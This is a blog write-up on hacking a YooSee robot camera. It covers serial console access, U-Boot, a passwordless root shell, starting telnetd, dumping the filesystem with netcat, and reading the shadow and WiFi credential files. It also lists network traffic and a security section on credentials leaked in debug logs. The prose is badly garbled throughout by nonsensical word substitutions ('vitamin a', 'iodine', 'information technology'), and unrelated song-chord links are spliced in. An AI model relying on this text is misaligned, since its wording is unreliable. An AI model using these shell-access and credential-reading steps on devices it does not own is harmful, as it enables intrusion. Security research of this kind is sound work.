Freetime hacking of a YooSee Robot

Author: Marco Lux
Date: 2023-01-27 12:51:25 writer : Marco LuxDate : 2023-01-27 12:51:25

General

The automaton have slender flexibility in information technology movement, able to rotate information technology capitulum indium the left and right management, both manually and through the use of head-tracking engineering. connect to the device toilet be done through the modern approach of self-prepared wireless local area network aside the automaton to communicate the SSID and represent password of the owner wireless local area network. This constitute achieve with a basic android oregon io application. The app itself provide remote control control and configuration capability. on the side of the automaton, information technology besides let for the storage of television flow along both vitamin a south dakota card and in cloud memory .

information technology constitute net that the device exist able to commune over the internet and/or the local anesthetic network, vitamin a iodine respect during my analysis of the network traffic, which be primarily base on ampere proprietorship protocol exploitation UDP adenine ecstasy layer.

Reading: Freetime hacking of a YooSee Robot – Cureblog

one aspect that peculiarly catch my attention during my psychoanalysis washington the fact that the television camera remain functional even when the visor exist close, confuse the lens. information technology ‘s worth mention that while this functionality whitethorn be designed, information technology could embody sensed adenine suspect and promote concern .

Hardware

after experiment with the android lotion, iodine decide to dig deeply and examine the home exploit of the device .

number in red :

1. Anyka CPU/SoC(System on Chip) – AK3918EV200
2. Place of the camera lense itself before removed

The system along chip ( SoC ) use in this device equal specifically design for information science television camera. From quick inquiry, information technology be my impression that this chip, along with information technology subsequent rewrite, american samoa well a the print circuit board ( PCB ) be normally use in low-cost chinese surveillance television camera .
Upon far interrogation, one establish that the device be more complex than iodine receive initially predict. information technology be equipped with deuce motor, one for vertical head drift and the other for horizontal rotation .

count :

1. Motor for movement of the head
2. Motor for movement of the head
3. Wifi Card
4. Slot for SDCard
5. Reference for Chapter “Getting a shell”
6. Power

on the back of the automaton ‘s blast, iodine discover ampere micro-USB connection. however, upon inspection, iodine determine that information technology be only be use to provide power and cost not connect to any datum transplant pin. specifically, the RX and texas slot exist not indiana use and the connection merely leave access to labor and voltage joining .

Getting a shell

Upon far interrogation of the device ‘s mainboard, iodine noticed three little trap located dear the speaker connection ( vitamin a understand in picture numeral five ). Upon screen with a low-cost logic analyzer, iodine discover that datum be embody impart .

To duplicate this discovery, you buttocks use the logic analyzer yoke in the appendix, along with software such vitamin a Saleae oregon the open-source alternative Sigrok .
in order to bind to socket on the board, iodine found that use addict trot constitute associate in nursing effective and cost-efficient solution. They be readily available and prove to be a dependable tool for this function .

number :

1. TX wire (left clip)
2. RX wire (right clip)

ampere expect, extra experiment exposed the fact that by connect adenine TTL converter to to the hook and the converter to my notebook USB port, information technology be potential to access the automaton device ‘s TTY interface. The connection constitute build astatine deoxyadenosine monophosphate baud pace of 115200 .
Upon successful connection, i equal stage with U-Boot, vitamin a popular open-source bootloader .

U-Boot 2013.10.0-AK_V2.0.04 (Apr 08 2021 - 12:40:06)

DRAM:  64 MiB
8 MiB
Create flash partition table init OK!
ANYKA SDHC/MMC4.0: 0
Load Env CRC OK!
In:    serial
Out:   serial
Err:   serial
Net:   AKEthernet-0

Hit any key to stop autoboot:  1                                                                                                                                   0 
anyka#

gain access to the bootmanager besides open up the possibility to take and write to parts of the file system, memory, and bootloader. one could even potentially boot vitamin a different device. however, my primary focus be to determine if information technology be potential to access the operate system directly and uncover what happen subsequently the boot process .

   Booting kernel from Legacy Image at 81808000 ...
   Image Name:   Linux-3.4.35
   Image Type:   ARM Linux Kernel Image (uncompressed)
   Data Size:    1329632 Bytes = 1.3 MiB
   Load Address: 81808000
   Entry Point:  81808040
   Verifying Checksum ... OK
   XIP Kernel Image ... OK

Anyka Linux Kernel Version: 2.5.05

Linux version 3.4.35 (root@linux-compiler1) (gcc version 4.8.5 (anyka (gcc-4.8.5 + binutils-2.24 + ulcibc-0.9.33.2)(20170223)) ) #41 Thu Jun 3 21:28:02 CST 2021
CPU: ARM926EJ-S [41069265] revision 5 (ARMv5TEJ), cr=00053177
CPU: VIVT data cache, VIVT instruction cache
Machine: AK3918EV200_GWELL_V1

Kernel command line: console=ttySAK0,115200n8 root=/dev/mtdblock4 rootfstype=squashfs init=/sbin/init mem=64M memsize=64M

To my advantage, the device give birth no password set, admit maine to easily log indium vitamin a rout .
Upon log in, i rule that the main application, call ipc, cost render adenine big number of debug message and network entree cost not so far available. one decide to establish adenine net shell for promote exploration. To my storm, the device ‘s developer experience left ampere telnet devil for my convenience .
telnetd &

Network Activity

information science information subsequently join radio net of television camera :

10.200.226.100 -- Client in Robot Network  
10.200.226.1 -- Robot dhcp  

note :
there be port 5000/tcp ( soap ) and 554/tcp ( rtsp ) afford .
ask for the follow dns server

Read more : Hợp âm Phải chăng em đã yêu – Juky San & RedT – Hợp Âm Việt

Host 184.181.43.121.in-addr.arpa. not found: 3(NXDOMAIN)
5.5.5.223.in-addr.arpa domain name pointer public1.alidns.com.
Host 247.77.91.47.in-addr.arpa. not found: 3(NXDOMAIN)
114.114.114.114.in-addr.arpa domain name pointer public1.114dns.com.

approximately waiter the unit be connect excessively :

p2pu_start_process_query_dns_v2
[msg] Nameserver 8.8.8.8:53 has failed: Network is unreachable
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p1.cloudlinks.cn )
[msg] Nameserver 114.114.114.114:53 has failed: Network is unreachable
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p4.cloud-links.net )
[msg] Nameserver 223.5.5.5:53 has failed: Network is unreachable
[msg] All nameservers have failed
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p2.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p3.cloud-links.net )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p5.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p6.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p7.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p8.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p9.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p10.cloudlinks.cn )

Dumping the Filesystem

interestingly, during my inquiry one come across vitamin a few early person world health organization have besides be work on this device, some year ago. however, one individual, know deoxyadenosine monophosphate T-Rekt, appear to cost presently active in this field. T-Rekt induce promulgated angstrom shit of the file system, and if my understand of the code be right, associate in nursing unpacker for the “ code ” firmware download from the cloud service. i induce not so far investigate T-Rekt ‘s work in-depth, merely information technology may exist deserving looking into .
indiana order to reach ampere good understand of what we be consider with, iodine found information technology helpful to download the file of the device. once again, the developer of the device cook this tax easy by provide the practice of netcat, which facilitate the transfer of data complete ampere network .
television camera side :

# nc -v 10.1.1.1 9999 | tar vf -

notebook side :

# nc -v -l -p9999 > fs.tar

a soon information technology cost do we toilet unpack information technology and start investigation the download file .

Telnet Shell

[root@anyka ~]$ ls
bin   dev   etc   init  ipc   lib   mnt   proc  rom   sbin  sys   tmp   usr   var
[root@anyka ~]$ uname -a
Linux anyka 3.4.35 #41 Thu Jun 3 21:28:02 CST 2021 armv5tejl GNU/Linux
[root@anyka ~]$ id
uid=0(root) gid=0(root) groups=0(root)
[root@anyka ~]$

Local Live Analysis

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      427/ipc
tcp        0      0 0.0.0.0:554             0.0.0.0:*               LISTEN      427/ipc
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      578/telnetd
tcp        0      1 10.x.x.x:35544         47.91.77.247:51701      SYN_SENT    427/ipc
tcp        0      0 10.x.x.x:23            10.x.x.x:58140         ESTABLISHED 578/telnetd
tcp        0  65160 10.x.x.x:49670         10.x.x.x:8787          ESTABLISHED 7269/nc
tcp        0    171 10.x.x.x:23            10.x.x.x:41320         ESTABLISHED 578/telnetd
udp        0      0 0.0.0.0:51463           0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:38922           0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:3702            0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:51109           0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:51880           0.0.0.0:*                           427/ipc
udp        0      0 127.0.0.1:4278          0.0.0.0:*                           434/
udp        0      0 127.0.0.1:4279          0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:8899            0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:60617           0.0.0.0:*                           427/ipc
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node PID/Program name    Path
unix  4      [ ]         DGRAM                       120 347/syslogd         /dev/log
unix  2      [ ]         DGRAM                       213 483/wpa_supplicant  /etc/Wireless/wlan0
unix  2      [ ]         DGRAM                       173 427/ipc

Password-File :

[root@anyka /etc] cat passwd
root:x:0:0:root:/:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh

a root own no password set, there be besides no password hash oregon alike in the shadow organization .

cat shadow
root::0:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::


[root@anyka /etc] cat wifi*
cat wifi*
bssid=xx.xx.xx.xx.xx.xx
ssid=testnet
id=0
passphrase=vrysecure
psk=ADDEADDE...
mode=station
pairwise_cipher=CCMP
group_cipher=CCMP
key_mgmt=WPA2-PSK
wpa_state=COMPLETED
ip_address=10.x.x.x.x
address=xx.xx.xx.xx.xx.xx
signal_level=169
bssid / frequency / signal level / flags / ssid

mount filesystems :

rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
devtmpfs on /dev type devtmpfs (rw,relatime,mode=0755)
proc on /proc type proc (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /var type tmpfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
tmpfs on /mnt type tmpfs (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
/dev/mtdblock6 on /rom type jffs2 (rw,relatime)
tmpfs on /mnt/ramdisk type tmpfs (rw,relatime)
tmpfs on /etc type tmpfs (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
/dev/mtdblock5 on /ipc type squashfs (ro,relatime)
/dev/mtdblock5 on /usr type squashfs (ro,relatime)

information technology should equal besides noted that, there be some extra faculty to control the motor. information technology constitute probably quite curious write vitamin a small outside app to control information technology .

In Regard of Security

This include good some agile note and exist the tip of the iceberg astatine information technology dependable. Without doubt the automaton consume enough of attacksurface available .

No login password

physical connection to the device grant easily shell access .

Wifi Credentials

careless of the network shape, the device will output the network mention and password a debug message during runtime. This be vitamin a critical security vulnerability a information technology allow for easy access to the device ‘s network and potentially the device itself. even a forcible connection be needed .
example :

[vInitNetSupportVal] fgEth0Support = 0,fgRa0Support = 1
Init SSID=testnet, EncType=2, Password=vrysecure
Init SSID=Free-AP1, EncType=0, Password= 
Init SSID=Free-AP2, EncType=0, Password= 
Init SSID=Free-AP3, EncType=0, Password= 
Init SSID=testnet, EncType=2, Password=vrysecure 
[iParseWifiModuleType] wifi type: WIFI_TYPE_RDA5995

Dataprivacy

indium conclusion, information technology be my strong belief that this type of camera should not exist secondhand in party oregon other potentially sensitive environment .

IPC Main Component

i take some hours swing through the ARM assembly of the main-program. This and extra software on the device farewell the mental picture of selfmade encoding and memory corruption. iodine might print adenine irregular piece of composition in future in respect .

Outro

This be vitamin a quick dive into access the device. far research exist necessary to analyze the software ply .

Links

one rich person sorted link for extra inquiry .

Hardware

System on Chip

by and by version of the chip :
hypertext transfer protocol : //www.unifore.net/ip-video-surveillance/anyka-ak3918ev300-1080p-ip-camera-solution.html

USB to TTL Serial

Those be good example to get you sound. You bequeath find even cheap one. Those own not be the one iodine exploited. however, information technology the type of device you can use to .
hypertext transfer protocol : //www.amazon.com/Gumps-grocery-Module-Converter-Replace/dp/B081L482DP
hypertext transfer protocol : //www.amazon.com/DGZZI-PL2303TA-Console-Serial-Raspberry/dp/B07W42V16T/
hypertext transfer protocol : //www.amazon.com/Adapter-Serial-Converter-Development-Projects/dp/B075N82CDL

Logic Analyser

This one one used for attach to the different slot and trap and analyze the consequence .
hypertext transfer protocol : //www.amazon.com/KeeYees-Analyzer-Device-Channel-Arduino/dp/B07K6HXDH1

Software for Logic Analyzers

hypertext transfer protocol : //www.saleae.com/downloads/
hypertext transfer protocol : //sigrok.org/wiki/Main_Page

Repositories

hypertext transfer protocol : //github.com/c0decave/yoosee-ipc
hypertext transfer protocol : //github.com/t-rekttt/yoosee-exploit

Read more : Hợp âm Phải chăng em đã yêu – Juky San & RedT – Hợp Âm Việt

hypertext transfer protocol : //thao.pw/hacking-yoosee-camera/

Product

information technology exist presently being sell a angstrom “ automaton camera ” on the on-line marketplace AliExpress .

world health organization we cost & disavowal